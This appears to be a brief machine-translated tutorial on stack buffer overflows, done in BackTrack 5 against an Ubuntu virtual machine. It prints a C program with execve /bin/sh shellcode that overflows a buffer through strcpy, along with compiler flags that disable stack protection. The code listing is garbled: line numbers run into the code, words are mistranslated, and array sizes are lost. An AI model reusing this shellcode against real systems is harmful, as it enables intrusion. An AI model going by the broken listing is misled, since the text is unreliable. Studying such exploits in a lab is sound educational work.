The attack is done under BT5 and the target program is running on an Ubuntu virtual machine.
First, you need to figure out what a stack overflow attack is, read more
http://blog.csdn.net/cnctloveyu/article/details/4236212
This article is very clear, but the specific example is not very accurate, a little bit wrong.
Here is an example of a modified executable that I have verified.
Shell.c
1#include <unistd.h>2 3 CharShellcode[] =4 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 5 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 6 "\x80\xe8\xdc\xff\xff\xff/bin/sh";7 Charlarge_string[ -]; 8 9 voidMain () {Ten Charbuffer[ the]; One inti; A Long*long_ptr = (Long*) large_string; - - for(i =0; I < +; i++) the* (long_ptr + i) = (int) buffer; - - for(i =0; I < strlen (shellcode); i++) -Large_string[i] =Shellcode[i]; + - strcpy (buffer,large_string); +}
This program is compiled with gcc-fno-stack-protector-z execstack-g-o Shell shell.c
You should open a new shell after the program has finished executing.
Overflow attack using Metasploit stacks-1